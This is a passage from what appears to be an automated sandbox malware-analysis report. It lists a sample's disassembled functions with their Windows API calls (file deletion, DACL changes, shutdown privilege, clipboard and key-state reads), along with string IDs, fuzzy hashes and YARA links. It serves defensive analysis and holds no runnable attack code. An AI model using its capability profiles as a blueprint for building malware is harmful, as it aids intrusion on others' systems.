                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007B221B
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B2226
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007B2242
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2269
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2280
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B2292
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00813A68), ref: 007B22B0
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B22BA
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B22C7
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B22D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                                        • Opcode ID: 6f34e4962898b76e3766152849bcb42eb48ef871e8bdc9770c67045ce39c8197
                                                                                                                                        • Instruction ID: efbf795fbe4566c31ef77079f5a1e0f8655bf379fb5073c67afd6b23ec43d16c
                                                                                                                                        • Opcode Fuzzy Hash: 6f34e4962898b76e3766152849bcb42eb48ef871e8bdc9770c67045ce39c8197
                                                                                                                                        • Instruction Fuzzy Hash: 8831E37150221DAACF20EBA4EC48FDE77ACBF49321F114151E910E6192DB389F96CB68
                                                                                                                                        Function 00766BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_memset
                                                                                                                                        • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                        • API String ID: 3555123492-286096704
                                                                                                                                        • Opcode ID: bec5fa940b2f50b2da5c8f3cd9435bc78ae301ae387e55540b4dfde19884bc09
                                                                                                                                        • Instruction ID: ef8feff985ff54e6451ecd548fc3ea7c22d37753bf5288add9c606ad3d851b0a
                                                                                                                                        • Opcode Fuzzy Hash: bec5fa940b2f50b2da5c8f3cd9435bc78ae301ae387e55540b4dfde19884bc09
                                                                                                                                        • Instruction Fuzzy Hash: E272C371E01259DBDF18CF99C8806EDB7B1FF48314F2481A9D856AB341E778AE81DB90
                                                                                                                                        Function 007CECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007CED0C
                                                                                                                                        • GetFocus.USER32 ref: 007CED1C
                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 007CED27
                                                                                                                                        • _memset.LIBCMT ref: 007CEE52
                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 007CEE7D
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 007CEE9D
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 007CEEB0
                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 007CEEE4
                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 007CEF2C
                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007CEF64
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 007CEF99
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 3616455698-4108050209
                                                                                                                                        • Opcode ID: 33760ed5a469983645ffe219894c93841074707718a1a10347b88de4da4f9491
                                                                                                                                        • Instruction ID: 6aae458522dac6ae4081d7b6ce810aeba83f6e9112609183a417c73c273671cc
                                                                                                                                        • Opcode Fuzzy Hash: 33760ed5a469983645ffe219894c93841074707718a1a10347b88de4da4f9491
                                                                                                                                        • Instruction Fuzzy Hash: 6B817C71208301AFEB60DF14D889F6BBBE8FB88354F10492DF99597291D738D945CB92
                                                                                                                                        Function 0079B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079B903
                                                                                                                                          • Part of subcall function 0079B8E7: GetLastError.KERNEL32(?,0079B3CB,?,?,?), ref: 0079B90D
                                                                                                                                          • Part of subcall function 0079B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0079B3CB,?,?,?), ref: 0079B91C
                                                                                                                                          • Part of subcall function 0079B8E7: RtlAllocateHeap.NTDLL(00000000,?,0079B3CB), ref: 0079B923
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079B93A
                                                                                                                                          • Part of subcall function 0079B982: GetProcessHeap.KERNEL32(00000008,0079B3E1,00000000,00000000,?,0079B3E1,?), ref: 0079B98E
                                                                                                                                          • Part of subcall function 0079B982: RtlAllocateHeap.NTDLL(00000000,?,0079B3E1), ref: 0079B995
                                                                                                                                          • Part of subcall function 0079B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0079B3E1,?), ref: 0079B9A6
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079B3FC
                                                                                                                                        • _memset.LIBCMT ref: 0079B411
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079B430
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B441
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0079B47E
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0079B49A
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B4B7
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0079B4C6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0079B4CD
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079B4EE
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 0079B4F5
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079B526
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0079B54C
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079B560
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                        • Opcode ID: cd260d190e65472c7cf08c000b2fb7bba3146638d45b23c290c6b65cb0e8f67d
                                                                                                                                        • Instruction ID: 85c4ceeb4baf75f5258dc40824c90f03c04e2ff7aa8ca41b4a96f20d6e573052
                                                                                                                                        • Opcode Fuzzy Hash: cd260d190e65472c7cf08c000b2fb7bba3146638d45b23c290c6b65cb0e8f67d
                                                                                                                                        • Instruction Fuzzy Hash: F0515D71900249EFDF10DFA4ED85EEEBB79FF08310F048119E915AB2A1D7399A15CB64
                                                                                                                                        Function 007A6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                          • Part of subcall function 007A7C0C: GetFileAttributesW.KERNEL32(?,007A6A7B), ref: 007A7C0D
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6E7E
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007A6E99
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007A6EAE
                                                                                                                                        • _wcscpy.LIBCMT ref: 007A6EDD
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6EEF
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6F01
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007A6F0E
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007A6F22
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007A6F3D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                                        • Opcode ID: 3f98d7a0780ff2604c6d807de2e906c786b2cf54ff6eb81b9c827aff72887e0c
                                                                                                                                        • Instruction ID: b8d4b25295b27204e94eabeba52a60cfbc65f2d923b94480f907b762502f199e
                                                                                                                                        • Opcode Fuzzy Hash: 3f98d7a0780ff2604c6d807de2e906c786b2cf54ff6eb81b9c827aff72887e0c
                                                                                                                                        • Instruction Fuzzy Hash: 56219572409384AEC710EBA4D8899DB77DCAF99214F444E1AF5D4C3141EA38E64D87A2
                                                                                                                                        Function 00765D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                        • API String ID: 0-2893523900
                                                                                                                                        • Opcode ID: 8b94ac654c273235a599568dc874f1f3a980d39c16f4c6d2bb1b270fbbff9abe
                                                                                                                                        • Instruction ID: 488ce68e76885a990940eb0c784b486ad11005f8023c24a6d1c954bd22882a65
                                                                                                                                        • Opcode Fuzzy Hash: 8b94ac654c273235a599568dc874f1f3a980d39c16f4c6d2bb1b270fbbff9abe
                                                                                                                                        • Instruction Fuzzy Hash: D362A4B1E00259DBDF24CF99C8947AEB7B5FF48310F54816AE846EB281D7789E41CB90
                                                                                                                                        Function 007B7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                        • Opcode ID: a6a309d449c9109d39bc89c3193fbafc26fc476826b8a848228687f1c25f2ba7
                                                                                                                                        • Instruction ID: 90513ca17b6e38453eb2a6c89637af6d83a8c0e986f9711f36d19a7c4bd3eaa7
                                                                                                                                        • Opcode Fuzzy Hash: a6a309d449c9109d39bc89c3193fbafc26fc476826b8a848228687f1c25f2ba7
                                                                                                                                        • Instruction Fuzzy Hash: 98216D31205250EFDB24AF64DC99B6D7BA8FF88751F00C019F90A9F261DB79AD41CB98
                                                                                                                                        Function 007B24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007B24F6
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007B2526
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B253A
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2555
                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007B25F3
                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007B2609
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                                        • Opcode ID: 9e7375626576ab1495576c2f93d96fab7054cbc4109eb5dd600b864d94da641a
                                                                                                                                        • Instruction ID: 20b0f82d8b6039c42e40636c8ed15d4006dc9ca3c0499c3605af6463c498c5f0
                                                                                                                                        • Opcode Fuzzy Hash: 9e7375626576ab1495576c2f93d96fab7054cbc4109eb5dd600b864d94da641a
                                                                                                                                        • Instruction Fuzzy Hash: B8417F7190521AAFCF24EFA4CC59BEE7BB4FF08304F104456E815A6192E7389E95CF90
                                                                                                                                        Function 00768530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: e7079a791bc3170b9841297266614a75c491fbcdcbc31fdfe33c97e8c03e1858
                                                                                                                                        • Instruction ID: 368526743c11e547a65e0b8903f6e75363030d4e53d4625c5c1e38f2d32e5fa5
                                                                                                                                        • Opcode Fuzzy Hash: e7079a791bc3170b9841297266614a75c491fbcdcbc31fdfe33c97e8c03e1858
                                                                                                                                        • Instruction Fuzzy Hash: 9E128E70A00609DFDF14DFA5D985AAEB3F5FF48300F208569E846E7251EB39AD12CB61
                                                                                                                                        Function 007CEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B736: GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                          • Part of subcall function 0077B736: ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        • ReleaseCapture.USER32 ref: 007CEB1A
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 007CEBC2
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007CEBD5
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 007CECAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                        • API String ID: 973565025-2107944366
                                                                                                                                        • Opcode ID: 9917c69a873b7a220af80e8cd096c05fc3077719cea0675a79300fa5f4fccb68
                                                                                                                                        • Instruction ID: 81488ab2d02b7f0ce199382b626ceb37cbaaff3bae9941a251038928b0da7a6f
                                                                                                                                        • Opcode Fuzzy Hash: 9917c69a873b7a220af80e8cd096c05fc3077719cea0675a79300fa5f4fccb68
                                                                                                                                        • Instruction Fuzzy Hash: 22519C70204304EFD724EF24CC9AF6A7BE5FB88700F10892DF995962A1D7789905CB62
                                                                                                                                        Function 007A82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079BF0F
                                                                                                                                          • Part of subcall function 0079BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0079BF3C
                                                                                                                                          • Part of subcall function 0079BEC3: GetLastError.KERNEL32 ref: 0079BF49
                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 007A830C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                                        • Opcode ID: 8be715ecfbf704127448726abbee2fe7b9a70fe6c23a28870a9ac22380c1afd1
                                                                                                                                        • Instruction ID: 942b4c74c5856b67c9e5acf749b70d874e84f9caa9c55fa23777cb69553c37cb
                                                                                                                                        • Opcode Fuzzy Hash: 8be715ecfbf704127448726abbee2fe7b9a70fe6c23a28870a9ac22380c1afd1
                                                                                                                                        • Instruction Fuzzy Hash: 2801D472651311AAEFA816689C8ABBF3258EB46B80F180624F903D50C1DE6C9C0081A5
                                                                                                                                        Function 007B91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
